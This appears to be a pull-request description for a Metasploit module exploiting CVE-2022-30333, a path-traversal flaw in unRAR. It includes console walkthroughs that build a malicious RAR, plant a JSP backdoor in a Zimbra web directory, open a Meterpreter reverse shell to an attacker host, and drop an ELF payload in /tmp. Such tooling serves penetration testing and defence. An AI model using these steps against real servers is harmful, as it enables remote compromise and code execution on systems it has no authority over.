### PR DESCRIPTION
Create an exploit module for CVE-2022-30333, which is a path-traversal vulnerability in unRAR. This exploit has two targets:

* Zimbra (default) - creates a .rar file that can be emailed to the target Zimbra server, with the payload configured to drop a .jsp file, then waits for that file to exist
* Generic RAR File - creates a .rar with an arbitrary payload that will extract to an arbitrary location

I showed off this exploit in Book Club a few days ago - lots of cleanups since then, including correctly calculating all the necessary CRC32's.

A couple small questions I have...
* To randomize the filename, but set the directory/extension correctly, I store it as three separate settings.. is there a better way to do that?
* I grabbed logic from `multi/handler` to poll till the shell appears, is that okay?
* I ask the user to email the file, rather than doing it myself.. I talked to @smcintyre-r7 a bit, and he thought that's reasonable, but somebody else suggested I use an email mixin. I think the user emailing is better, since Metasploit isn't really a social-engineering platform, but I'm open to changing that
* I created two targets - one specifically for Zimbra and another to make a generic RAR with a payload. Is that sensible?

## Verification

To test the Zimbra target, you obviously need a vulnerable version of Zimbra with a vulnerable version of `unrar` - I can send details or export a VM if it helps. Once that's going, you can use these commands:

```
msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set RHOSTS 10.0.0.154
RHOSTS => 10.0.0.154
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/sbrnabwujh.jsp
[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
[+] File created! Email the file above to any user on the target Zimbra server
[*] Trying to trigger the backdoor @ public/sbrnabwujh.jsp...
[*] Trying to trigger the backdoor @ public/sbrnabwujh.jsp...
[*] Trying to trigger the backdoor @ public/sbrnabwujh.jsp...
[*] Sending stage (3020772 bytes) to 10.0.0.154
[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/sbrnabwujh.jsp
[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.154:51664) at 2022-07-20 13:33:25 -0700

meterpreter > getuid
Server username: zimbra
```

Or, to use the generic target:

```
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET 1
TARGET => 1
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH '../../../../../../../../../tmp'
TARGET_PATH => ../../../../../../../../../tmp
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_EXTENSION 'elf'
TARGET_EXTENSION => elf
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit

[*] Target filename: ../../../../../../../../../tmp/hftb.elf
[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
```

(then, in a shell with a vulnerable version of unrar)

```
ron@fedora ~/tools/unrar $ ./unrar x -o+ ~/.msf4/local/payload.rar
UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal

Extracting from /home/ron/.msf4/local/payload.rar

Extracting  ZEnFEoDkBpQZ                                              OK 
Extracting  ZEnFEoDkBpQZ                                              OK 
All OK
ron@fedora ~/tools/unrar $ file /tmp/hftb.elf 
/tmp/hftb.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
```